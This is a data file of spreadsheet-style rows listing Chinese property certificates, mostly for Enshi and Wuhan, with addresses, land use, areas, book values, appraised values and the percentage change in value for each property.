[57,"鄂（2018）武汉市武昌不动产权第0002258号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元8层25号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"8/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":18917,"d":"18,917.00"},{"v":637124.56,"d":"637,124.56"},{"v":-36475.44,"d":"-36,475.44"},-5.42]
[58,"鄂（2018）武汉市武昌不动产权第0002221号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元8层26号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"8/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":18917,"d":"18,917.00"},{"v":637124.56,"d":"637,124.56"},{"v":-36475.44,"d":"-36,475.44"},-5.42]
[59,"京（2018）朝不动产权第0028828号",null,null,"朝阳区枣营北里37号楼13层37-8",null,"/","住宅","住宅",null,"/","钢混结构",{"$nulls":3},"13/18",{"$nulls":6},"㎡",{"v":116.2,"d":"116.20"},null,null,{"v":8168900,"d":"8,168,900.00"},{"v":75016,"d":"75,016.00"},{"v":8716859.2,"d":"8,716,859.20"},{"v":547959.2,"d":"547,959.20"},6.71]
[60,"鄂（2021）恩施市不动产权第0008754号",null,null,"恩施市舞阳街道办事处博物馆路2号1幢原博物馆大楼号",null,{"v":12796.57,"d":"12,796.57"},"文体娱乐用地","办公",null,"/","钢混结构",{"$nulls":3},"1-4/4",{"$nulls":6},"㎡",{"v":2741.15,"d":"2,741.15"},null,null,{"v":28240000,"d":"28,240,000.00"},{"v":10142,"d":"10,142.00"},{"v":27800743.3,"d":"27,800,743.30"},{"v":-439256.7,"d":"-439,256.70"},-1.56]
[61,"鄂（2018）武汉市洪山不动产权第0090325号",null,null,"洪山区雄楚大街299号剑桥铭邸4-2-102",null,14.25,"城镇住宅用地","住宅","2003-07-01","2073-07-31","钢混结构",{"$nulls":3},"1/12",{"$nulls":6},"㎡",157.65,null,null,{"v":3026900,"d":"3,026,900.00"},{"v":17404,"d":"17,404.00"},{"v":2743740.6,"d":"2,743,740.60"},{"v":-283159.4,"d":"-283,159.40"},-9.35]
[62,"鄂（2018）武汉市洪山不动产权第0090277号",null,null,"洪山区雄楚大街299号剑桥铭邸5-2-302",null,13.32,"城镇住宅用地","住宅","2003-07-01","2073-07-31","钢混结构",{"$nulls":3},"3/12",{"$nulls":6},"㎡",143.49,null,null,{"v":2755000,"d":"2,755,000.00"},{"v":17926,"d":"17,926.00"},{"v":2572201.74,"d":"2,572,201.74"},{"v":-182798.26,"d":"-182,798.26"},-6.64]
[63,"鄂（2018）武汉市洪山不动产权第0090321号",null,null,"洪山区雄楚大街299号剑桥铭邸5-2-1102",null,19.17,"城镇住宅用地","住宅","2003-07-01","2073-07-31","钢混结构",{"$nulls":3},"11/12",{"$nulls":6},"㎡",206.49,null,null,{"v":3737500,"d":"3,737,500.00"},{"v":17216,"d":"17,216.00"},{"v":3554931.84,"d":"3,554,931.84"},{"v":-182568.16,"d":"-182,568.16"},-4.88,"复式"]
[64,"琼(2019)海口市不动产权第0058055号",null,null,"海口市文明东路上坡公寓D栋403房",null,18.01,"城镇住宅用地","住宅","1991-04-01","2061-04-25","钢混结构",{"$nulls":3},"4/8",{"$nulls":6},"㎡",{"v":82,"d":"82.00"},null,null,{"v":787200,"d":"787,200.00"},{"v":11170,"d":"11,170.00"},{"v":915940,"d":"915,940.00"},{"v":128740,"d":"128,740.00"},16.35]
[65,"琼(2019)海口市不动产权第0058054号",null,null,"海口市文明东路上坡公寓C栋302房",null,17.28,"城镇住宅用地","住宅","1991-04-01","2061-04-25","钢混结构",{"$nulls":3},"3/8",{"$nulls":6},"㎡",{"v":78.7,"d":"78.70"},null,null,{"v":755500,"d":"755,500.00"},{"v":11170,"d":"11,170.00"},{"v":879079,"d":"879,079.00"},{"v":123579,"d":"123,579.00"},16.36]
[66,"鄂（2019）恩施州不动产权第0000042号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢2单元0901号",null,13.02,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"9/30",{"$nulls":6},"㎡",97.26,null,null,{"v":690500,"d":"690,500.00"},{"v":7343,"d":"7,343.00"},{"v":714180.18,"d":"714,180.18"},{"v":23680.18,"d":"23,680.18"},3.43]
[67,"鄂（2019）恩施州不动产权第0000041号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢2单元0903号",null,8.71,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"9/30",{"$nulls":6},"㎡",65.07,null,null,{"v":462000,"d":"462,000.00"},{"v":7343,"d":"7,343.00"},{"v":477809.01,"d":"477,809.01"},{"v":15809.01,"d":"15,809.01"},3.42]
[68,"鄂（2019）恩施州不动产权第0000029号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元0901号",null,15.24,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"9/30",{"$nulls":6},"㎡",113.86,null,null,{"v":808400,"d":"808,400.00"},{"v":7343,"d":"7,343.00"},{"v":836073.98,"d":"836,073.98"},{"v":27673.98,"d":"27,673.98"},3.42]
[69,"鄂（2019）恩施州不动产权第0000044号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元0902号",null,6.24,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"9/30",{"$nulls":6},"㎡",46.61,null,null,{"v":330900,"d":"330,900.00"},{"v":7343,"d":"7,343.00"},{"v":342257.23,"d":"342,257.23"},{"v":11357.23,"d":"11,357.23"},3.43]
[70,"鄂（2019）恩施州不动产权第0000045号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元0903号",null,18.78,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"9/30",{"$nulls":6},"㎡",140.26,null,null,{"v":995800,"d":"995,800.00"},{"v":7343,"d":"7,343.00"},{"v":1029929.18,"d":"1,029,929.18"},{"v":34129.18,"d":"34,129.18"},3.43]
[71,"鄂（2019）恩施州不动产权第0000046号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元0904号",null,{"v":15.5,"d":"15.50"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"9/30",{"$nulls":6},"㎡",115.78,null,null,{"v":822000,"d":"822,000.00"},{"v":7343,"d":"7,343.00"},{"v":850172.54,"d":"850,172.54"},{"v":28172.54,"d":"28,172.54"},3.43]
[72,"鄂（2019）恩施州不动产权第0000047号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元0905号",null,{"v":8.3,"d":"8.30"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"9/30",{"$nulls":6},"㎡",61.97,null,null,{"v":440000,"d":"440,000.00"},{"v":7343,"d":"7,343.00"},{"v":455045.71,"d":"455,045.71"},{"v":15045.71,"d":"15,045.71"},3.42]
[73,"鄂（2019）恩施州不动产权第0000048号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元0906号",null,{"v":12,"d":"12.00"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"9/30",{"$nulls":6},"㎡",89.65,null,null,{"v":636500,"d":"636,500.00"},{"v":7343,"d":"7,343.00"},{"v":658299.95,"d":"658,299.95"},{"v":21799.95,"d":"21,799.95"},3.42]
[74,"鄂（2019）恩施州不动产权第0000049号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1001号",null,15.24,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"10/30",{"$nulls":6},"㎡",113.86,null,null,{"v":808400,"d":"808,400.00"},{"v":7343,"d":"7,343.00"},{"v":836073.98,"d":"836,073.98"},{"v":27673.98,"d":"27,673.98"},3.42]
[75,"鄂（2019）恩施州不动产权第0000040号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1002号",null,6.24,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"10/30",{"$nulls":6},"㎡",46.61,null,null,{"v":330900,"d":"330,900.00"},{"v":7343,"d":"7,343.00"},{"v":342257.23,"d":"342,257.23"},{"v":11357.23,"d":"11,357.23"},3.43]
[76,"鄂（2019）恩施州不动产权第0000032号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1003号",null,18.78,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"10/30",{"$nulls":6},"㎡",140.26,null,null,{"v":995800,"d":"995,800.00"},{"v":7343,"d":"7,343.00"},{"v":1029929.18,"d":"1,029,929.18"},{"v":34129.18,"d":"34,129.18"},3.43]
[77,"鄂（2019）恩施州不动产权第0000031号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1004号",null,{"v":15.5,"d":"15.50"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"10/30",{"$nulls":6},"㎡",115.78,null,null,{"v":822000,"d":"822,000.00"},{"v":7343,"d":"7,343.00"},{"v":850172.54,"d":"850,172.54"},{"v":28172.54,"d":"28,172.54"},3.43]
[78,"鄂（2019）恩施州不动产权第0000030号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1005号",null,{"v":8.3,"d":"8.30"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"10/30",{"$nulls":6},"㎡",61.97,null,null,{"v":440000,"d":"440,000.00"},{"v":7343,"d":"7,343.00"},{"v":455045.71,"d":"455,045.71"},{"v":15045.71,"d":"15,045.71"},3.42]
[79,"鄂（2019）恩施州不动产权第0000039号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1006号",null,{"v":12,"d":"12.00"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"10/30",{"$nulls":6},"㎡",89.65,null,null,{"v":636500,"d":"636,500.00"},{"v":7343,"d":"7,343.00"},{"v":658299.95,"d":"658,299.95"},{"v":21799.95,"d":"21,799.95"},3.42]
[80,"鄂（2019）恩施州不动产权第0000038号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1101号",null,15.24,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"11/30",{"$nulls":6},"㎡",113.86,null,null,{"v":808400,"d":"808,400.00"},{"v":7343,"d":"7,343.00"},{"v":836073.98,"d":"836,073.98"},{"v":27673.98,"d":"27,673.98"},3.42]
[81,"鄂（2019）恩施州不动产权第0000037号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1102号",null,6.24,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"11/30",{"$nulls":6},"㎡",46.61,null,null,{"v":330900,"d":"330,900.00"},{"v":7343,"d":"7,343.00"},{"v":342257.23,"d":"342,257.23"},{"v":11357.23,"d":"11,357.23"},3.43]
[82,"鄂（2019）恩施州不动产权第0000036号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1103号",null,18.78,"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"11/30",{"$nulls":6},"㎡",140.26,null,null,{"v":995800,"d":"995,800.00"},{"v":7343,"d":"7,343.00"},{"v":1029929.18,"d":"1,029,929.18"},{"v":34129.18,"d":"34,129.18"},3.43]
[83,"鄂（2019）恩施州不动产权第0000035号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1104号",null,{"v":15.5,"d":"15.50"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"11/30",{"$nulls":6},"㎡",115.78,null,null,{"v":822000,"d":"822,000.00"},{"v":7343,"d":"7,343.00"},{"v":850172.54,"d":"850,172.54"},{"v":28172.54,"d":"28,172.54"},3.43]
[84,"鄂（2019）恩施州不动产权第0000034号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1105号",null,{"v":8.3,"d":"8.30"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"11/30",{"$nulls":6},"㎡",61.97,null,null,{"v":440000,"d":"440,000.00"},{"v":7343,"d":"7,343.00"},{"v":455045.71,"d":"455,045.71"},{"v":15045.71,"d":"15,045.71"},3.42]
[85,"鄂（2019）恩施州不动产权第0000033号",null,null,"恩施市舞阳街道办事处东风大道276号（九立方）1幢3单元1106号",null,{"v":12,"d":"12.00"},"城镇住宅用地","住宅","2013-08-01","2083-08-12","钢混结构",{"$nulls":3},"11/30",{"$nulls":6},"㎡",89.65,null,null,{"v":636500,"d":"636,500.00"},{"v":6735,"d":"6,735.00"},{"v":603792.75,"d":"603,792.75"},{"v":-32707.25,"d":"-32,707.25"},-5.14]
[86,"鄂（2018）巴东县不动产权第0004963号",null,null,"巴东县信陵镇大坪社区万福路一期-1层仓储用房1-08",null,54.61,"商业住宅用地","仓储","2016-01-18","2066-01-18","钢混结构",{"$nulls":3},"-1/9",{"$nulls":6},"㎡",245.91,null,null,{"v":1155800,"d":"1,155,800.00"},{"v":4690,"d":"4,690.00"},{"v":1153317.9,"d":"1,153,317.90"},{"v":-2482.1,"d":"-2,482.10"},-0.21,"根据与农发担保公司签订协议，恩施城外资产由农发担保公司管理"]
[87,"鄂（2018）巴东县不动产权第0004967号",null,null,"巴东县信陵镇大坪社区万福路一期-1层仓储用房1-03",null,54.61,"商业住宅用地","仓储","2016-01-18","2066-01-18","钢混结构",{"$nulls":3},"-1/9",{"$nulls":6},"㎡",245.91,null,null,{"v":1155800,"d":"1,155,800.00"},{"v":4690,"d":"4,690.00"},{"v":1153317.9,"d":"1,153,317.90"},{"v":-2482.1,"d":"-2,482.10"},-0.21]
[88,"鄂（2018）巴东县不动产权第0004966号",null,null,"巴东县信陵镇大坪社区万福路一期-1层仓储用房1-06",null,54.61,"商业住宅用地","仓储","2016-01-18","2066-01-18","钢混结构",{"$nulls":3},"-1/9",{"$nulls":6},"㎡",245.91,null,null,{"v":1155800,"d":"1,155,800.00"},{"v":4690,"d":"4,690.00"},{"v":1153317.9,"d":"1,153,317.90"},{"v":-2482.1,"d":"-2,482.10"},-0.21]
[89,"鄂（2018）巴东县不动产权第0004965号",null,null,"巴东县信陵镇大坪社区万福路一期-1层仓储用房1-02",null,54.61,"商业住宅用地","仓储","2016-01-18","2066-01-18","钢混结构",{"$nulls":3},"-1/9",{"$nulls":6},"㎡",245.91,null,null,{"v":1155800,"d":"1,155,800.00"},{"v":4690,"d":"4,690.00"},{"v":1153317.9,"d":"1,153,317.90"},{"v":-2482.1,"d":"-2,482.10"},-0.21]
[90,"鄂（2018）巴东县不动产权第0004964号",null,null,"巴东县信陵镇大坪社区万福路一期-1层仓储用房1-07",null,54.61,"商业住宅用地","仓储","2016-01-18","2066-01-18","钢混结构",{"$nulls":3},"-1/9",{"$nulls":6},"㎡",245.91,null,null,{"v":1155800,"d":"1,155,800.00"},{"v":4690,"d":"4,690.00"},{"v":1153317.9,"d":"1,153,317.90"},{"v":-2482.1,"d":"-2,482.10"},-0.21]
[91,"鄂（2018）宣恩县不动产权第0001179号",null,null,"湖北宣恩工业园区椒园生态产业园7幢2楼201号等5户",null,{"v":1722.4,"d":"1,722.40"},"工业用地","工业","2014-09-09","2064-09-09","/",{"$nulls":3},"/",{"$nulls":6},"㎡","/",null,null,{"v":5225200,"d":"5,225,200.00"},null,{"v":5211900,"d":"5,211,900.00"},{"v":-13300,"d":"-13,300.00"},-0.25]
[{"$nulls":6},"/","工业用地","工业",null,null,"钢混结构",{"$nulls":3},"1-5",{"$nulls":6},"㎡",{"v":4063,"d":"4,063.00"}]
[92,"鄂（2018）建始县不动产权第0003828号",null,null,"建始县业州镇指阳社区徐家沟路",null,119.76,"城镇住宅用地","住宅","2009-11-28","2079-11-28","混合结构",{"$nulls":3},"1-5",{"$nulls":6},"㎡",{"v":598.8,"d":"598.80"},null,null,{"v":2934100,"d":"2,934,100.00"},{"v":4845,"d":"4,845.00"},{"v":2901186,"d":"2,901,186.00"},{"v":-32914,"d":"-32,914.00"},-1.12]
[93,"鄂（2018）建始县不动产权第0003829号",null,null,"建始县业州镇广润社区文苑路10号",null,{"v":120,"d":"120.00"},"城镇住宅用地","住宅","2014-12-02","2015-07-21","混合结构",{"$nulls":3},"1-4",{"$nulls":6},"㎡",442.58,null,null,{"v":2257200,"d":"2,257,200.00"},{"v":5090,"d":"5,090.00"},{"v":2252732.2,"d":"2,252,732.20"},{"v":-4467.8,"d":"-4,467.80"},{"v":-0.2,"d":"-0.20"}]
[94,"鄂（2018）恩施州不动产权第0000227号",null,null,"恩施市小渡船街道办事处施州大道66号（福星城）2幢0108号",null,5.33,"商服用地","商业服务","2007-11-01","2047-11-02","钢混结构",{"$nulls":3},"1/24",{"$nulls":6},"㎡",50.61,null,null,{"v":855300,"d":"855,300.00"},{"v":13931,"d":"13,931.00"},{"v":705047.91,"d":"705,047.91"},{"v":-150252.09,"d":"-150,252.09"},-17.57]
[95,"鄂（2018）恩施州不动产权第0000224号",null,null,"恩施市小渡船街道办事处施州大道66号（福星城）2幢0205号",null,{"v":6.3,"d":"6.30"},"商服用地","商业服务","2007-11-01","2047-11-02","钢混结构",{"$nulls":3},"2/24",{"$nulls":6},"㎡",59.77,null,null,{"v":606100,"d":"606,100.00"},{"v":6966,"d":"6,966.00"},{"v":416357.82,"d":"416,357.82"},{"v":-189742.18,"d":"-189,742.18"},-31.31]
[96,"鄂（2018）恩施州不动产权第0000228号",null,null,"恩施市小渡船街道办事处施州大道66号（福星城）2幢0206号",null,11.36,"商服用地","商业服务","2007-11-01","2047-11-02","钢混结构",{"$nulls":3},"2/24",{"$nulls":6},"㎡",107.76,null,null,{"v":1092700,"d":"1,092,700.00"},{"v":6966,"d":"6,966.00"},{"v":750656.16,"d":"750,656.16"},{"v":-342043.84,"d":"-342,043.84"},{"v":-31.3,"d":"-31.30"}]
[97,"鄂（2018）恩施市不动产权第0010740号",null,null,"恩施市小渡船街道办事处施州大道66号（福星城）2幢0207号",null,7.54,"商服用地","商业服务","2007-11-01","2047-11-02","钢混结构",{"$nulls":3},"2/24",{"$nulls":6},"㎡",71.56,null,null,{"v":725600,"d":"725,600.00"},{"v":6966,"d":"6,966.00"},{"v":498486.96,"d":"498,486.96"},{"v":-227113.04,"d":"-227,113.04"},{"v":-31.3,"d":"-31.30"}]
[98,"鄂（2018）恩施州不动产权第0000221号",null,null,"恩施市小渡船街道办事处施州大道66号（福星城）2幢0212号",null,6.76,"商服用地","商业服务","2007-11-01","2047-11-02","钢混结构",{"$nulls":3},"2/24",{"$nulls":6},"㎡",64.11,null,null,{"v":650100,"d":"650,100.00"},{"v":6966,"d":"6,966.00"},{"v":446590.26,"d":"446,590.26"},{"v":-203509.74,"d":"-203,509.74"},{"v":-31.3,"d":"-31.30"}]
[99,"鄂（2018）恩施州不动产权第0000225号",null,null,"恩施市小渡船街道办事处施州大道66号（福星城）2幢0213号",null,4.45,"商服用地","商业服务","2007-11-01","2047-11-02","钢混结构",{"$nulls":3},"2/24",{"$nulls":6},"㎡",42.26,null,null,{"v":428500,"d":"428,500.00"},{"v":6966,"d":"6,966.00"},{"v":294383.16,"d":"294,383.16"},{"v":-134116.84,"d":"-134,116.84"},{"v":-31.3,"d":"-31.30"}]
[100,"鄂（2018）恩施州不动产权第0000226号",null,null,"恩施市小渡船街道办事处施州大道66号（福星城）5幢1单元0106号",null,12.13,"商服用地","商业服务","2007-11-01","2047-11-02","钢混结构",{"$nulls":3},"1/24",{"$nulls":6},"㎡",110.66,null,null,{"v":1870200,"d":"1,870,200.00"},{"v":13931,"d":"13,931.00"},{"v":1541604.46,"d":"1,541,604.46"},{"v":-328595.54,"d":"-328,595.54"},-17.57]
[101,"鄂（2018）恩施州不动产权第0000229号",null,null,"恩施市小渡船街道办事处施州大道66号（福星城）5幢1单元0206号",null,13.26,"商服用地","商业服务","2007-11-01","2047-11-02","钢混结构",{"$nulls":3},"2/24",{"$nulls":6},"㎡",120.97,null,null,{"v":1226600,"d":"1,226,600.00"},{"v":7800,"d":"7,800.00"},{"v":943566,"d":"943,566.00"},{"v":-283034,"d":"-283,034.00"},-23.07]
[102,"鄂（2018）恩施州不动产权第0000239号",null,null,"恩施市六角亭街道办事处松树坪村(国际汽车城)8幢1单元117、217号",null,61.43,"商服用地","商业服务","2012-07-01","2052-07-16","钢混结构",{"$nulls":3},"1-2",{"$nulls":6},"㎡",82.74,null,null,{"v":984600,"d":"984,600.00"},{"v":7055,"d":"7,055.00"},{"v":583730.7,"d":"583,730.70"},{"v":-400869.3,"d":"-400,869.30"},-40.71]
[103,"鄂（2018）恩施州不动产权第0000238号",null,null,"恩施市小渡船街道办事处旗峰大道13号1幢101-501号",null,{"v":121.3,"d":"121.30"},"城镇住宅用地","住宅","1976-07-01","2046-07-04","混合结构",{"$nulls":3},"1-5",{"$nulls":6},"㎡",{"v":593.3,"d":"593.30"},null,null,{"v":3203800,"d":"3,203,800.00"},{"v":4873,"d":"4,873.00"},{"v":2891150.9,"d":"2,891,150.90"},{"v":-312649.1,"d":"-312,649.10"},-9.76]
[104,"鄂（2018）恩施州不动产权第0000236号",null,null,"恩施市舞阳街道办事处耿家坪村",null,{"v":2981.45,"d":"2,981.45"},"商服用地","/","2012-07-01","2052-12-27","/",{"$nulls":3},"/",{"$nulls":6},"㎡","/",null,null,"/",{"v":5361,"d":"5,361.00"},{"v":15822455.4,"d":"15,822,455.40"},{"v":-413244.6,"d":"-413,244.60"},-0.03]
[{"$nulls":4},"恩施市舞阳街道办事处耿家坪村",null,"/","商服用地","4S店",null,null,"钢混结构",{"$nulls":3},"1-4",{"$nulls":6},"㎡",{"v":2951.4,"d":"2,951.40"},null,null,{"v":16235700,"d":"16,235,700.00"}]
[105,"鄂（2018）恩施州不动产权第0000237号",null,null,"恩施市小渡船街道办事处航空大道212号1幢1单元402号",null,20.37,"城镇住宅用地","住宅","2013-07-01","2083-07-14","钢混结构",{"$nulls":3},"4/5",{"$nulls":6},"㎡",75.43,null,null,{"v":377200,"d":"377,200.00"},{"v":4677,"d":"4,677.00"},{"v":352786.11,"d":"352,786.11"},{"v":-24413.89,"d":"-24,413.89"},-6.47]
[106,"鄂（2018）恩施州不动产权第0000222号",null,null,"恩施市小渡船街道办事处航空路149号1幢101、201、301、401号",null,136.82,"商业住宅用地","商服住宅","1989-01-01","2029-01-14","混合结构",{"$nulls":3},"1-4/4",{"$nulls":6},"㎡",424.89,null,null,{"v":3229200,"d":"3,229,200.00"},{"v":6836,"d":"6,836.00"},{"v":2904548.04,"d":"2,904,548.04"},{"v":-324651.96,"d":"-324,651.96"},-10.05]
[107,"鄂（2018）恩施州不动产权第0000223号",null,null,"恩施市屯堡乡屯堡社区居委会1幢-101-301号",null,{"v":2820.55,"d":"2,820.55"},"工业用地","工业厂房","2008-10-01","2058-10-29","混合结构",{"$nulls":3},"-1-3/4",{"$nulls":6},"㎡",{"v":2466.91,"d":"2,466.91"},null,null,{"v":3285800,"d":"3,285,800.00"},{"v":1422,"d":"1,422.00"},{"v":3507946.02,"d":"3,507,946.02"},{"v":222146.02,"d":"222,146.02"},6.76]
[108,"鄂（2019）恩施州不动产权第0000026号",null,null,"恩施市舞阳街道办事处沿江路1幢-101-301号",null,215.34,"商业住宅用地","商服住宅","2008-02-01","2048-02-27","混合结构",{"$nulls":3},"-1-3/4",{"$nulls":6},"㎡",876.54,null,null,{"v":5785200,"d":"5,785,200.00"},{"v":5014,"d":"5,014.00"},{"v":4394971.56,"d":"4,394,971.56"},{"v":-1390228.44,"d":"-1,390,228.44"},-24.03]
[109,"鄂（2019）恩施州不动产权第0000013号",null,null,"恩施市舞阳街道办事处东风大道467号",null,{"v":6838.41,"d":"6,838.41"},"机关团体用地","办公",null,"/","混合结构",{"$nulls":3},"1-2/2",{"$nulls":6},"㎡",946.35,null,null,{"v":6342600,"d":"6,342,600.00"},{"v":3750,"d":"3,750.00"},{"v":3548812.5,"d":"3,548,812.50"},{"v":-409275,"d":"-409,275.00"},-0.06]
[{"$nulls":8},"办公",null,"/","混合结构",{"$nulls":3},"1-2/2",{"$nulls":6},"㎡",635.87,{"$nulls":3},{"v":3750,"d":"3,750.00"},{"v":2384512.5,"d":"2,384,512.50"}]
[110,"鄂（2019）恩施州不动产权第0000016号",null,null,"恩施市舞阳街道办事处东风大道565号1幢101、201号",null,414.71,"机关团体用地","办公",null,"/","混合结构",{"$nulls":3},"1-2/2",{"$nulls":6},"㎡",381.66,null,null,{"v":1717500,"d":"1,717,500.00"},{"v":4740,"d":"4,740.00"},{"v":1809068.4,"d":"1,809,068.40"},{"v":91568.4,"d":"91,568.40"},5.33]
[111,"鄂（2019）恩施州不动产权第0000015号",null,null,"恩施市小渡船街道办事处航空路49号",null,886.54,"商业用地","商业服务",null,"/","混合结构",{"$nulls":3},"1-2/2",{"$nulls":6},"㎡",320.41,null,null,{"v":1505900,"d":"1,505,900.00"},{"v":4585,"d":"4,585.00"},{"v":1469079.85,"d":"1,469,079.85"},{"v":-36820.15,"d":"-36,820.15"},-2.45]
[{"$nulls":8},"商业服务",null,"/","混合结构",{"$nulls":3},"1-4/4",{"$nulls":6},"㎡",{"v":1131.21,"d":"1,131.21"},null,null,{"v":5316700,"d":"5,316,700.00"},{"v":4585,"d":"4,585.00"},{"v":5186597.85,"d":"5,186,597.85"},{"v":-130102.15,"d":"-130,102.15"},-2.45]
[112,"鄂（2020）恩施市不动产权第0034993号",null,null,"恩施市舞阳街道办事处土桥大道146号",null,{"v":1525.2,"d":"1,525.20"},"机关团体用地","办公",null,"/","钢混结构",{"$nulls":3},"-1-8/9",{"$nulls":6},"㎡",{"v":2209.59,"d":"2,209.59"},null,null,{"v":9943200,"d":"9,943,200.00"},{"v":4201,"d":"4,201.00"},{"v":9282487.59,"d":"9,282,487.59"},{"v":-660712.41,"d":"-660,712.41"},-6.64]
[113,"鄂（2020）恩施市不动产权第0034992号",null,null,"恩施市小渡船街道办事处航空大道三巷6号",null,{"v":1785.29,"d":"1,785.29"},"机关团体用地","办公",null,"/","混合结构",{"$nulls":3},"1-4/4",{"$nulls":6},"㎡",812.94,null,null,{"v":2328700,"d":"2,328,700.00"},{"v":4435,"d":"4,435.00"},{"v":3605388.9,"d":"3,605,388.90"},{"v":1276688.9,"d":"1,276,688.90"},54.82]
[114,"鄂（2020）恩施市不动产权第0036296号",null,null,"恩施市舞阳街道办事处新建街65号1棟105号",null,22.34,"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"3/3",{"$nulls":6},"㎡",77.62,null,null,{"v":310500,"d":"310,500.00"},{"v":4507,"d":"4,507.00"},{"v":349833.34,"d":"349,833.34"},{"v":39333.34,"d":"39,333.34"},12.67]
[115,"鄂（2020）恩施市不动产权第0036297号",null,null,"恩施市舞阳街道办事处新建街65号2棟2单元2-2号",null,20.63,"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"1/4",{"$nulls":6},"㎡",71.56,null,null,{"v":286200,"d":"286,200.00"},{"v":4507,"d":"4,507.00"},{"v":322520.92,"d":"322,520.92"},{"v":36320.92,"d":"36,320.92"},12.69]
[116,"鄂（2020）恩施市不动产权第0036301号",null,null,"恩施市舞阳街道办事处新建街65号2棟1单元1-1号",null,24.77,"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"1/4",{"$nulls":6},"㎡",85.93,null,null,{"v":352300,"d":"352,300.00"},{"v":4507,"d":"4,507.00"},{"v":387286.5,"d":"387,286.50"},{"v":34986.5,"d":"34,986.50"},9.93]
[117,"鄂（2020）恩施市不动产权第0036958号",null,null,"恩施市舞阳街道办事处新建街65号1棟1单元101号",null,22.34,"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"1/3",{"$nulls":6},"㎡",77.62,null,null,{"v":318200,"d":"318,200.00"},{"v":4507,"d":"4,507.00"},{"v":349833.34,"d":"349,833.34"},{"v":31633.34,"d":"31,633.34"},9.94]
[118,"鄂（2020）恩施市不动产权第0041940号",null,null,"恩施市舞阳大街213号2棟3单元301号",null,31.55,"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"1/6",{"$nulls":6},"㎡",109.25,null,null,{"v":469800,"d":"469,800.00"},{"v":4357,"d":"4,357.00"},{"v":476002.25,"d":"476,002.25"},{"v":6202.25,"d":"6,202.25"},1.32]
[119,"鄂（2020）恩施市不动产权第0043618号",null,null,"恩施市舞阳街道办事处舞阳大道213号1棟101号",null,{"v":1379.59,"d":"1,379.59"},"城镇住宅用地","住宅",null,"/","混合结构",{"$nulls":3},"1/1",{"$nulls":6},"㎡",{"v":146.2,"d":"146.20"},null,null,{"v":2904900,"d":"2,904,900.00"},{"v":4357,"d":"4,357.00"},{"v":636993.4,"d":"636,993.40"},{"v":-2267906.6,"d":"-2,267,906.60"},-78.07]
[120,"鄂（2020）恩施州不动产权第0000004号",null,null,"恩施市六角亭街道办事处后山湾路",null,{"v":12237.98,"d":"12,237.98"},"机关团体用地","/",null,"/","/",{"$nulls":3},"/",{"$nulls":6},"/","/",null,null,{"v":5066500,"d":"5,066,500.00"},{"v":873,"d":"873.00"},{"v":10683756.54,"d":"10,683,756.54"},{"v":5617256.54,"d":"5,617,256.54"},110.87]
